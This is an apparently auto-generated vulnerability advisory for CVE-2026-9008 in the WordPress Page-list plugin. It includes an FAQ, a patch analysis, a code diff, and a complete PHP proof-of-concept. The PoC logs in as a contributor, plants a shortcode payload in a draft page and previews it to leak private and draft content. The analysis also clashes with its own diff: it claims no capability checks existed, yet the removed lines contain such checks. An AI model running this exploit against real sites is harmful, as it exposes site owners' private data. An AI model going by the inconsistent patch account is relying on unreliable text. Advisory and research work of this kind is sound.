What is CVE-2026-9008?

CVE-2026-9008 is a missing authorization vulnerability in the Page-list plugin for WordPress versions up to and including 6.2. It allows authenticated users with contributor-level access and above to disclose sensitive information from private and draft pages by using specific shortcode attributes.

How does this vulnerability work?

The vulnerability arises from the pagelist_unqprfx_ext_shortcode() function, which accepts user-controlled attributes without proper capability checks. This allows attackers to retrieve titles, content, and metadata of private or draft pages when they insert the shortcode into a post and preview it.

Who is affected by CVE-2026-9008?

Any WordPress site using the Page-list plugin version 6.2 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability to access sensitive information.

How can I check if my site is vulnerable?

You can check your Page-list plugin version in the WordPress admin under Plugins. If it is version 6.2 or earlier, your site is vulnerable to CVE-2026-9008.

How can I fix CVE-2026-9008?

To mitigate this vulnerability, update the Page-list plugin to version 6.3 or later, where the vulnerability has been patched. Regularly check for updates to ensure your plugins are secure.

What does the CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while it does not allow for remote code execution or privilege escalation, it can still lead to significant information disclosure, which could be exploited by attackers.

What is a proof of concept (PoC) in this context?

The proof of concept for CVE-2026-9008 is a PHP script that demonstrates how an authenticated user can exploit the vulnerability to access sensitive information. It outlines the steps to authenticate and use the vulnerable shortcode to retrieve data.

What are shortcode attributes in WordPress?

Shortcode attributes in WordPress are parameters that can be passed to shortcodes to modify their behavior. In this case, the attributes ‘post_status’, ‘post_type’, and ‘show_meta_key’ were exploited to access unauthorized data.

How does the patch address the vulnerability?

The patch for CVE-2026-9008 hardens the shortcode by removing the ability to specify ‘post_status’ from user input, restricting it to ‘publish’. It also requires specific capabilities for accessing metadata and removes unnecessary queries that could lead to unauthorized data access.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the Page-list plugin until the update can be applied. Additionally, review user roles and permissions to limit access to contributor-level users.

Where can I find more information about CVE-2026-9008?

More information about CVE-2026-9008 can be found in the official CVE database, security advisories from Wordfence, and detailed vulnerability reports from security researchers.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 11, 2026

CVE-2026-9008: Page-list <= 6.2 Missing Authorization to Authenticated (Contributor+) Sensitive Information Disclosure via Shortcode Attributes PoC, Patch Analysis & Rule

CVE ID CVE-2026-9008

Plugin page-list

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 6.2

Patched Version 6.3

Disclosed June 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9008: A missing authorization vulnerability in the Page-list plugin for WordPress versions up to and including 6.2 allows authenticated attackers with contributor-level access or higher to disclose sensitive information from private and draft pages, as well as arbitrary post meta, via the [pagelist_ext] shortcode. The vulnerability carries a CVSS score of 4.3 (Medium).

The root cause lies in the pagelist_unqprfx_ext_shortcode() function defined in /page-list/inc/shortcode-pagelist-ext.php (lines 29-57 of the vulnerable code). The function accepted user-supplied post_status, post_type, and show_meta_key attributes directly from the shortcode without proper authorization checks. It passed these into get_pages() and get_post_meta() calls. When the current post had no child pages, the query re-issued with child_of => 0, expanding the scope to all pages on the site matching the supplied status and type. No capability check verified that the rendering user had permission to read the matched objects.

An attacker with contributor-level access or above can craft a post containing the shortcode [pagelist_ext post_status=’private,draft’ post_type=’page’ show_meta_key=’_some_meta’] and preview it. The shortcode processes these attributes without checking if the user can read private or draft pages. The get_pages() call retrieves all pages matching the status (including non-public ones), and get_post_meta() disclosure occurs for protected meta keys if the user lacks edit_others_posts capability. The WordPress AJAX handler (admin-ajax.php) with action=heartbeat or a simple preview triggers the vulnerable function.

The patch hardens three areas: (1) post_status is no longer accepted from shortcode; it is hardcoded to ‘publish’. (2) show_meta_key now requires edit_posts capability and the meta key must be registered with show_in_rest=true and not be protected. (3) The per-page read_post fallback loop was removed as unnecessary since only published pages are now retrieved. The complete removal of the post_status parameter from shortcode defaults and all wp_list_pages calls across four shortcode files prevents non-public statuses from being passed to database queries.

Exploitation allows an authenticated contributor to read titles, body content, excerpts, and arbitrary post meta of private, draft, pending, future, or even trashed pages that should be invisible to them. This constitutes a moderate information disclosure vulnerability. It does not lead to remote code execution or privilege escalation, but it can expose sensitive content such as unreleased products, internal documentation, or confidential metadata.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/page-list/inc/shortcode-pagelist-ext.php
+++ b/page-list/inc/shortcode-pagelist-ext.php
@@ -29,7 +29,6 @@
 			'number' => '',
 			'offset' => 0,
 			'post_type' => 'page',
-			'post_status' => 'publish',
 			'class' => '',
 			'strip_tags' => 1,
 			'strip_shortcodes' => 1,
@@ -55,30 +54,26 @@
 			$child_of = isset($post->ID) ? $post->ID : 0;
 		}

-		// --- Security hardening (CVE: Wordfence ticket 454582) ---
+		// --- Security hardening (Wordfence ticket 454582) ---
+		// post_status is no longer accepted from the shortcode: only published
+		// content is ever listed. This removes the unauthorized-disclosure
+		// vector for private/draft pages entirely.
+		$post_status = 'publish';
 		// Restrict post_type to public post types; fall back to 'page' otherwise.
 		$pagelist_ext_allowed_types = get_post_types( array( 'public' => true ) );
 		if ( ! is_array( $pagelist_ext_allowed_types ) || ! in_array( $post_type, $pagelist_ext_allowed_types, true ) ) {
 			$post_type = 'page';
 		}
-		// Restrict post_status: only allow non-public statuses if the current
-		// user has the capability to read those posts for the requested type.
-		$pagelist_ext_requested_status = $post_status;
-		$post_status = 'publish';
-		$pagelist_ext_pt_obj = get_post_type_object( $post_type );
-		if ( $pagelist_ext_requested_status === 'private'
-			&& $pagelist_ext_pt_obj
-			&& current_user_can( $pagelist_ext_pt_obj->cap->read_private_posts ) ) {
-			$post_status = 'private';
-		} elseif ( in_array( $pagelist_ext_requested_status, array( 'draft', 'pending', 'future', 'trash' ), true )
-			&& $pagelist_ext_pt_obj
-			&& current_user_can( $pagelist_ext_pt_obj->cap->edit_others_posts ) ) {
-			$post_status = $pagelist_ext_requested_status;
-		}
-		// Disallow protected (underscore-prefixed) meta keys unless the user
-		// can edit others' posts. Prevents disclosure of arbitrary post meta.
-		if ( $show_meta_key !== '' && is_protected_meta( $show_meta_key, 'post' ) && ! current_user_can( 'edit_others_posts' ) ) {
-			$show_meta_key = '';
+		// Restrict show_meta_key to prevent disclosure of arbitrary or protected
+		// post meta. Users who cannot edit posts may only read meta keys that are
+		// registered as publicly visible (show_in_rest) and are not protected.
+		if ( $show_meta_key !== '' && ! current_user_can( 'edit_posts' ) ) {
+			$pagelist_ext_registered_meta = get_registered_meta_keys( 'post' );
+			if ( is_protected_meta( $show_meta_key, 'post' )
+				|| ! isset( $pagelist_ext_registered_meta[ $show_meta_key ] )
+				|| empty( $pagelist_ext_registered_meta[ $show_meta_key ]['show_in_rest'] ) ) {
+				$show_meta_key = '';
+			}
 		}

 		$page_list_ext_args = array(
@@ -156,14 +151,6 @@
 		$offset_count = 0;
 		if ( $list_pages !== false && count( $list_pages ) > 0 ) {
 			foreach($list_pages as $page){
-				// Skip pages the current user is not permitted to read
-				// (Wordfence ticket 454582). Only enforced for non-public
-				// statuses; published pages are visible to everyone and
-				// current_user_can( 'read_post', ... ) returns false for
-				// anonymous viewers, which would hide published content.
-				if ( $post_status !== 'publish' && ! current_user_can( 'read_post', $page->ID ) ) {
-					continue;
-				}
 				$count++;
 				$offset_count++;
 				if ( !empty( $offset ) && is_numeric( $offset ) && $offset_count <= $offset ) {
--- a/page-list/inc/shortcode-pagelist.php
+++ b/page-list/inc/shortcode-pagelist.php
@@ -27,8 +27,7 @@
 			'sort_order'   => $sort_order,
 			'link_before'  => esc_html($link_before),
 			'link_after'   => esc_html($link_after),
-			'post_type'    => $post_type,
-			'post_status'  => $post_status
+			'post_type'    => $post_type
 		);
 		$list_pages = wp_list_pages( $page_list_args );

--- a/page-list/inc/shortcode-siblings.php
+++ b/page-list/inc/shortcode-siblings.php
@@ -31,8 +31,7 @@
 			'sort_order'   => $sort_order,
 			'link_before'  => esc_html($link_before),
 			'link_after'   => esc_html($link_after),
-			'post_type'    => $post_type,
-			'post_status'  => $post_status
+			'post_type'    => $post_type
 		);
 		$list_pages = wp_list_pages( $page_list_args );

--- a/page-list/inc/shortcode-subpages.php
+++ b/page-list/inc/shortcode-subpages.php
@@ -27,8 +27,7 @@
 			'sort_order'   => $sort_order,
 			'link_before'  => esc_html($link_before),
 			'link_after'   => esc_html($link_after),
-			'post_type'    => $post_type,
-			'post_status'  => $post_status
+			'post_type'    => $post_type
 		);
 		$list_pages = wp_list_pages( $page_list_args );

--- a/page-list/page-list.php
+++ b/page-list/page-list.php
@@ -3,7 +3,7 @@
 Plugin Name: Page-list
 Plugin URI: http://wordpress.org/plugins/page-list/
 Description: [pagelist], [subpages], [siblings] and [pagelist_ext] shortcodes
-Version: 6.2
+Version: 6.3
 Author: webvitaly
 Author URI: http://web-profile.net/wordpress/plugins/
 License: GPLv3
@@ -11,7 +11,7 @@

 if ( ! defined( 'ABSPATH' ) ) { exit; }

-define('PAGE_LIST_PLUGIN_VERSION', '6.2');
+define('PAGE_LIST_PLUGIN_VERSION', '6.3');
 define('PAGE_LIST_PLUGIN_FILE', __FILE__);

 $pagelist_unq_settings = array(
@@ -36,7 +36,6 @@
 		'link_before' => '',
 		'link_after' => '',
 		'post_type' => 'page',
-		'post_status' => 'publish',
 		'class' => ''
 	)
 );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-9008 - Page-list <= 6.2 - Missing Authorization to Authenticated (Contributor+) Sensitive Information Disclosure via Shortcode Attributes

// Configuration
$target_url = 'http://example.com'; // Change this to the target WordPress site
$username = 'contributor_user';     // Change to an account with Contributor role or higher
$password = 'password';             // Change to the account password

// Step 1: Authenticate and get cookies
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Get the AJAX nonce and create a draft with the malicious shortcode
// First, fetch the WordPress admin page to get a nonce
$admin_url = $target_url . '/wp-admin/post-new.php?post_type=page';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$response = curl_exec($ch);

// Extract nonce from page source (simple regex for demonstration)
preg_match('/var wpApiSettings = (.*?);/s', $response, $matches);
$wpApiSettings = json_decode($matches[1], true);
$nonce = isset($wpApiSettings['nonce']) ? $wpApiSettings['nonce'] : '';

if (empty($nonce)) {
    // Fallback: try to find _wpnonce from the edit form
    preg_match('/<input type="hidden" id="_wpnonce" name="_wpnonce" value="([^"]+)"/', $response, $m);
    if (isset($m[1])) {
        $nonce = $m[1];
    } else {
        // Could not get nonce, try direct REST API approach
        $nonce = '';
    }
}
curl_close($ch);

// Step 3: Create a draft page with the exploit shortcode via WordPress REST API
$rest_url = $target_url . '/wp-json/wp/v2/pages';
$payload = [
    'title' => 'Exploit Test Page',
    'content' => '[pagelist_ext post_status="draft,private" post_type="any" show_meta_key="_edit_lock"]',
    'status' => 'draft',
    'meta' => new stdClass()
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $nonce
]);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$response = curl_exec($ch);
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

$post_data = json_decode($response, true);
if ($httpcode == 201 && isset($post_data['id'])) {
    echo "[+] Draft page created with ID: " . $post_data['id'] . "n";
    $page_id = $post_data['id'];
    // Step 4: Trigger the shortcode by previewing the page
    $preview_url = $target_url . '/?page_id=' . $page_id . '&preview=true';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $preview_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    $response = curl_exec($ch);
    curl_close($ch);
    // The response will contain the disclosed content if vulnerable
    echo "[+] Preview URL: $preview_urln";
    echo "[+] Check response for leaked private/draft page titles and meta.n";
} else {
    echo "[-] Failed to create draft page. HTTP code: $httpcoden";
    if (isset($post_data['message'])) {
        echo "[-] Error: " . $post_data['message'] . "n";
    }
}

// Clean up
unlink('/tmp/cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-9008?
Overview of the vulnerability
CVE-2026-9008 is a missing authorization vulnerability in the Page-list plugin for WordPress versions up to and including 6.2. It allows authenticated users with contributor-level access and above to disclose sensitive information from private and draft pages by using specific shortcode attributes.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the pagelist_unqprfx_ext_shortcode() function, which accepts user-controlled attributes without proper capability checks. This allows attackers to retrieve titles, content, and metadata of private or draft pages when they insert the shortcode into a post and preview it.
Who is affected by CVE-2026-9008?
Identifying vulnerable users
Any WordPress site using the Page-list plugin version 6.2 or earlier is affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability to access sensitive information.
How can I check if my site is vulnerable?
Identifying vulnerable versions
You can check your Page-list plugin version in the WordPress admin under Plugins. If it is version 6.2 or earlier, your site is vulnerable to CVE-2026-9008.
How can I fix CVE-2026-9008?
Updating the plugin
To mitigate this vulnerability, update the Page-list plugin to version 6.3 or later, where the vulnerability has been patched. Regularly check for updates to ensure your plugins are secure.
What does the CVSS score of 4.3 mean?
Understanding severity levels
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while it does not allow for remote code execution or privilege escalation, it can still lead to significant information disclosure, which could be exploited by attackers.
What kind of information can be disclosed?
Types of sensitive data at risk
Exploitation of this vulnerability can lead to the disclosure of titles, body content, excerpts, and arbitrary post meta of private, draft, pending, future, or trashed pages that should not be visible to the contributor.
What is a proof of concept (PoC) in this context?
Demonstrating the vulnerability
The proof of concept for CVE-2026-9008 is a PHP script that demonstrates how an authenticated user can exploit the vulnerability to access sensitive information. It outlines the steps to authenticate and use the vulnerable shortcode to retrieve data.
What are shortcode attributes in WordPress?
Understanding shortcode functionality
Shortcode attributes in WordPress are parameters that can be passed to shortcodes to modify their behavior. In this case, the attributes ‘post_status’, ‘post_type’, and ‘show_meta_key’ were exploited to access unauthorized data.
How does the patch address the vulnerability?
Changes made in the patched version
The patch for CVE-2026-9008 hardens the shortcode by removing the ability to specify ‘post_status’ from user input, restricting it to ‘publish’. It also requires specific capabilities for accessing metadata and removes unnecessary queries that could lead to unauthorized data access.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If you cannot update the plugin immediately, consider disabling the Page-list plugin until the update can be applied. Additionally, review user roles and permissions to limit access to contributor-level users.
Where can I find more information about CVE-2026-9008?
Resources for further reading
More information about CVE-2026-9008 can be found in the official CVE database, security advisories from Wordfence, and detailed vulnerability reports from security researchers.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started